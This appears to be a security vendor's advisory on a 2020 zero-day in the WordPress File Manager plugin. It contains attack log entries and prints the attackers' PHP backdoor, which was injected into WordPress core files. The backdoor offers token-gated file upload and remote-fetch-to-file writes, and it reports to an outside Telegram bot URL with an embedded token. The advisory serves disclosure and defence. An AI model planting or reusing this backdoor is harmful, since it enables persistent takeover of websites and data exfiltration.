Critical zero-day vulnerability fixed in WordPress File Manager (700,000+ installations).

The popular WordPress File Manager plugin (700,000+ installations) fixed a critical zero-day vulnerability affecting version 6.8 and below.
The vulnerability allows an unauthenticated user to run the file manager commands by directly accessing an unprotected file from its elFinder package:
Here’s a sample log we found today on one the several hacked websites we had to deal with:

185.222.57.0 - - [31/Aug/2020:17:25:23 +0200] "POST //wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 1085 www.xxxxxxxxx.com "-" "python-requests/2.24.0" "-"
185.222.57.0 - - [31/Aug/2020:17:25:27 +0200] "POST //wp-content/plugins/wp-file-manager/lib/files/hardfork.php HTTP/1.1" 200 13665 www.xxxxxxxxx.com "-" "python-requests/2.24.0" "-"

The hacker uploaded a hardfork.php script and used it to inject code into the WordPress /wp-admin/admin-ajax.php and /wp-includes/user.php scripts.

Interestingly, hackers are immediately password-protecting the vulnerable file by injecting some code to it, in order to prevent other hackers from exploiting the vulnerability:

<?php if(md5(md5(md5($_POST['token_admin']))) != 'f20f3f5205036fcc28f25126e3a165e4') die('forbiden');

error_reporting(0); // Set E_ALL for debuging

// // Optional exec path settings (Default is called with command name only)
// define('ELFINDER_TAR_PATH',      '/PATH/TO/tar');
// define('ELFINDER_GZIP_PATH',     '/PATH/TO/gzip');

Here’s the code injected by the attackers into core files:

            try{
            if($_POST['action']=="wp_ajax_try_2020_v2"){
               if(!empty ($_FILES['file']) and md5(md5(md5($_POST['token_admin'])))=="4baa15b2adf2fac31c44f28d9c86daa7"){
                 if(function_exists("move_uploaded_file")){
                  @move_uploaded_file($_FILES['file']['tmp_name'],"../".$_FILES['file']['name']);
                  echo " file name : ".$_FILES['file']['name'];
                      }else{
                         die("no move_upload_file");
                      }                    
               }else{
                  die(0);
               }               
               exit();
            }
            if($_POST['action']=="wp_ajax_try_2020_v3"){
               if(!empty ($_POST['content']) and md5(md5(md5($_POST['token_admin'])))=="4baa15b2adf2fac31c44f28d9c86daa7"){
                  if(function_exists("file_get_contents")){
                          $html=file_get_contents($_POST['content']);
                    $save=fopen($_POST['name'],"w");
                    fwrite($save,$html);
                    fclose($save);
                  }else{
                           die("no file_get_contents");
                  }                     
               }else{
                  die(0);
               }               
               exit();
            }         
         }catch (Exception $e) {
            if(function_exists("file_get_contents")){
               try{
                  file_get_contents("https://api.telegram.org/bot1234572065:AAGxojnCQEsIMuofDuQHaM-8wnM2VkYOMO4/sendMessage?chat_id=1110165405&text=" . urlencode($_SERVER['REMOTE_ADDR']."  error wp")."" );
                  file_get_contents("https://api.telegram.org/bot1234572065:AAGxojnCQEsIMuofDuQHaM-8wnM2VkYOMO4/sendMessage?chat_id=1110165405&text=" . urlencode($e)."" );
               }catch (Exception $e2) {}
               
            }            
         }

Recommendations

Update immediately in you are running File Manager < 6.9.

If you were hacked, you can also reinstall WordPress from the “Dashboard > Updates” menu to clean-up the infected core files, and change all admin users and database passwords.
If you are using our web application firewall for WordPress, NinjaFirewall WP Edition (free) and NinjaFirewall WP+ Edition (premium), you were protected against this vulnerability if you had enabled its Full WAF mode. For other users, we have released new specific security rules.

Stay informed about the latest vulnerabilities